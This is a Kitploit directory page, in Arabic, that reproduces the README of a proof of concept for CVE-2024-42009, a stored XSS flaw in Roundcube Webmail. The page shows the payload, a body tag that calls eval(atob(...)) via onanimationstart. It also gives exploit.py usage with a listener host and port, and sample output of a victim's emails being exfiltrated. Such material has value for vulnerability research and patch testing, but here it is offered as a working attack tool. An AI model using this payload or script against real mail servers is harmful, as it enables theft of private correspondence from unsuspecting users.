Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-42009-PoC — إثبات المفهوم CVE-2024-42009 | Kitploit
أدوات/GitHubGitHub/danithehack3r/cve-2024-42009-poc
أدوات التصيدالاستغلالاستغلال تطبيقات الويبتسريب البياناتالتعلم والتعليمأمان البريد الإلكتروني
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

إثبات المفهوم CVE-2024-42009

عرض المستودع
71منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-42009 PoC: مستمع التقاط البريد الإلكتروني واستغلال XSS في Roundcube Webmail

نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال CVE-2024-42009، وهي ثغرة تخزين للبرمجة النصية عبر المواقع (XSS) في Roundcube Webmail الإصدار 1.6.7 وعدة إصدارات أخرى. يوضح الاستغلال كيف يمكن للمهاجم حقن JavaScript خبيث في رسالة والاستفادة من مشكلة إزالة التعقيم (desanitization) عند تحليل HTML داخل الرسالة، والتي يمكن استخدامها بعد ذلك لسحب محتوى البريد الإلكتروني من صندوق وارد الضحية في هذا المثال أو حتى السيطرة على متصفح الضحية.

تفاصيل الثغرة

وصف CVE

تسمح ثغرة البرمجة النصية عبر المواقع (XSS) في Roundcube حتى الإصدار 1.5.7 ومن 1.6.x حتى 1.6.7 لمهاجم عن بُعد بسرقة وإرسال رسائل البريد الإلكتروني الخاصة بالضحية عبر رسالة بريد إلكتروني مصممة بعناية تستغل مشكلة إزالة التعقيم (Desanitization) في الدالة message_body() في program/actions/mail/show.php.

شرح حمولة XSS (في هذا المثال)

يستخدم الاستغلال مشغل حركة CSS لتنفيذ XSS:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

يتم تحليل وسم body كعنصر div، ومن ثم نحتاج إلى التكيف مع ذلك، ولهذا السبب نستخدم السمة onanimationstart لاستدعاء دالة eval وتنفيذ استدعاءات JavaScript معقدة من خلالها. لقراءة المزيد حول كيفية عمل الاستغلال وأين توجد الثغرات في Roundcube، اقرأ هذه المقالة.

النطاق

  • تم اختبار هذا الاستغلال فقط على Roundcube Webmail الإصدار 1.6.7
  • يجب على الضحية فتح الرسالة لمشاهدة محتوياتها
  • قد يفشل إذا تم تكوين سياسة أمان المحتوى (CSP) بشكل صحيح

الاستخدام

المتطلبات

قم بتثبيت حزم Python المطلوبة:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

وسائط سطر الأوامر

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • رابط الهدف (Target URL): في هذه الحالة نستخدم نقطة نهاية نموذج الاتصال التي تعالج الرسائل ثم تعيد توجيهها (مثل: http://email.company.local/contact)
  • البريد الإلكتروني للمستلم (Recipient email): عنوان بريد إلكتروني صالح سيستلم الرسالة الخبيثة
  • مضيف المستمع (Listener host): عنوان IP الخاص بجهازك الذي يمكن الوصول إليه من الهدف
  • منفذ المستمع (Listener port): منفذ متاح لخادم HTTP (مثل: 4444)

مثال على الاستخدام

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

المخرجات المتوقعة

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

المراجع

أبحاث الثغرة

  • مدونة SonarSource: رسائل البريد الحكومية في خطر - ثغرة حرجة في البرمجة النصية عبر المواقع في Roundcube Webmail
  • فيديو توضيحي من SonarSource

إخلاء المسؤولية القانوني

⚠️ مهم: هذا إثبات المفهوم مقدم لأغراض تعليمية واختبارات مصرح بها فقط. استخدمه بمسؤولية، وهذا الحساب غير مسؤول عن أي ضرر يسببه الآخرون.

تنزيل الأداة